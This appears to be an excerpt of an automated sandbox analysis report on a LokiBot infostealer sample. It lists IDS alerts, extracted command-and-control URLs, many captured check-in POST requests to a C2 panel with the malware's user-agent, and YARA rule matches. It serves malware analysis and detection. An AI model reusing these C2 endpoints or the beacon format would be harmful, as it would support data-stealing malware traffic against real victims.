                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49950 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49907 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49895 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49895 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50002 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50002 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50002 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49885 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49813 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49813 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50002 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49813 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49895 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49895 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50002 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49813 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49885 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49813 -> 92.113.16.63:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49885 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50020 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50020 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50020 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50020 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:50020 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49879 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49879 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49879 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49879 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49879 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49885 -> 92.113.16.67:80
                  Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.5:49885 -> 92.113.16.67:80
                  Source: Malware configuration extractorURLs: http://kbfvzoboss.bid/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.trade/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.win/alien/fre.php
                  Source: Malware configuration extractorURLs: http://alphastand.top/alien/fre.php
                  Source: Joe Sandbox ViewASN Name: UKRTELNETUA UKRTELNETUA
                  Source: Joe Sandbox ViewASN Name: UKRTELNETUA UKRTELNETUA
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 180Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: global trafficHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 153Connection: close
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 1_2_00404ED4 recv,1_2_00404ED4
                  Source: global trafficDNS traffic detected: DNS query: publicspeaking.co.id
                  Source: unknownHTTP traffic detected: POST /okoye/Panel/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: publicspeaking.co.idAccept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: C84394D2Content-Length: 180Connection: close
                  Source: vbc.exe, vbc.exe, 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
                  Source: vbc.exe, 00000001.00000002.3381859873.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000001.00000002.3381859873.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000001.00000002.3381639404.00000000004A0000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://publicspeaking.co.id/okoye/Panel/five/fre.php

                  System Summary

                  barindex
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.vbc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 1.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Hh8hqqbu9X.exe.4520930.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Hh8hqqbu9X.exe.44fc0f0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki Payload Author: kevoreilly
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 0.2.Hh8hqqbu9X.exe.330680c.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Loki Payload Author: kevoreilly
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
                  Source: 00000001.00000002.3381639404.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables containing common artifcats observed in infostealers Author: ditekSHen
                  Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
                  Source: 00000000.00000002.2118840141.00000000044E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
